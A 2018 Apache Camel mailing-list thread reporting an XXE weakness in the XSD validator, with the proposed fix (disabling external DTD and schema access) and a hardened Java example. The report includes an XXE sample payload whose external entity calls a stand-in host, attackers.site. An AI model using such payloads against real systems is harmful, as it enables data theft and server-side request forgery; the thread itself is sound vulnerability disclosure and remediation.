Posted to users@camel.apache.org by Karel Jelínek <ka...@unicorn.com> on 2018/04/14 11:23:51 UTC

XML External Entity (XXE) - validator vulnerability ?

Dear All,
we are using the XSD validation processor from the camel-core library

...
.to("validator:classpath:xsd/exportenv70.xsd")
...

Our penetration tests found that the application can be attacked by "XML 
External Entity (XXE)" 
(https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator)

We think that the classes infected by this vulnerability are

org.apache.camel.processor.validation.SchemaReader.java
org.apache.camel.processor.validation.ValidatingProcessor.java

Method SchemaReader.createSchemaFactory should also set the property 
"factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"

Method ValidatingProcessor.doProcess should set the properties on the validator object

Validator validator = schema.newValidator();
//prevent XXE attack
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

If we try to validate the infected XML against the XSD, we can see that Camel is 
trying to access an external site (attackers.site in this example)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
%remote;
%run;
%trick;]>

Disabling the mentioned properties should do the trick

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator


I would like to ask you whether this will be filed as a security BUG in 
Camel and whether it will be fixed in a future version.

Can we use some workaround, such as writing our own implementation of 
ValidatingProcessor? Is that possible?

-- 

Best regards

Karel Jelínek
Unicorn Systems
https://unicorn.com/
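The two settings Karel proposes, applied to both the SchemaFactory and the Validator, in a stand-alone JAXP program (an added example, not Camel's code and not part of the original mail). The schema, the clean document and the document carrying an external DOCTYPE reference are constructed here; the DTD host is a placeholder that is never contacted, because the validator refuses the fetch before any connection is made:

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.xml.sax.SAXException;

/**
 * Hardened XSD validation: external DTD and external schema access is switched
 * off on the SchemaFactory (which loads the XSD) and again on the Validator
 * (which parses the instance document), as the thread and the OWASP XXE cheat
 * sheet recommend.
 */
public class HardenedXsdValidation {

    // Constructed sample schema: a single <root> element with string content.
    static final String XSD =
          "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">"
        + "  <xs:element name=\"root\" type=\"xs:string\"/>"
        + "</xs:schema>";

    // Constructed sample document that is otherwise valid but declares an
    // external DTD (placeholder host; not a real location).
    static final String XML_WITH_EXTERNAL_DTD =
          "<?xml version=\"1.0\"?>"
        + "<!DOCTYPE root SYSTEM \"http://dtd.example.invalid/root.dtd\">"
        + "<root>hello</root>";

    static final String CLEAN_XML = "<root>hello</root>";

    /** A SchemaFactory that will not fetch external DTDs or schema documents. */
    static SchemaFactory hardenedSchemaFactory() throws SAXException {
        SchemaFactory factory =
            SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return factory;
    }

    /**
     * Validates xml against schema with a hardened Validator.
     * Returns null when the document is accepted, otherwise the parser's
     * error message (including refused external access).
     */
    static String validate(Schema schema, String xml) {
        try {
            Validator validator = schema.newValidator();
            // Set explicitly on the Validator too; this is the object that
            // parses the untrusted instance document.
            validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
            validator.validate(new StreamSource(new StringReader(xml)));
            return null;
        } catch (SAXException | IOException e) {
            return e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        Schema schema = hardenedSchemaFactory()
            .newSchema(new StreamSource(new StringReader(XSD)));

        String clean = validate(schema, CLEAN_XML);
        System.out.println("clean document: "
            + (clean == null ? "accepted" : "rejected: " + clean));

        String withDtd = validate(schema, XML_WITH_EXTERNAL_DTD);
        System.out.println("document with external DTD: "
            + (withDtd == null ? "accepted" : "rejected: " + withDtd));
    }
}
```

The second document is rejected with a SAXParseException saying that the external DTD could not be read because "http" access is not allowed by the accessExternalDTD property, so no request ever leaves the host. One caveat worth keeping in mind: these properties only govern fetches performed by the validator itself. If the message has already been parsed into a DOM or SAX stream by another component before it reaches validation, the entity expansion has already happened there, and that parser (DocumentBuilderFactory, SAXParserFactory) needs the same restrictions.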

Re: XML External Entity (XXE) - validator vulnerability ?

Posted by Willem Jiang <wi...@gmail.com>.
Hi Karel,

Normally we talk about this kind of issue in the private mailing list[1].
As you have already provided a fix for it, you can send a PR [2] with the fix as
the contribution document [3] suggests. I'd be happy to apply it to
camel-core.

I'm not sure how you deployed the Camel application. Normally you can
create a patch jar which just has the fixed classes and put it as the first
element in the class path to override the old version of the Camel class.

[1]https://www.apache.org/security/#reporting-a-vulnerability
[2]https://github.com/apache/camel
[3]https://github.com/apache/camel/blob/master/CONTRIBUTING.md


Willem Jiang

Blog: http://willemjiang.blogspot.com (English)
          http://jnn.iteye.com  (Chinese)
Twitter: willemjiang
Weibo: 姜宁willem
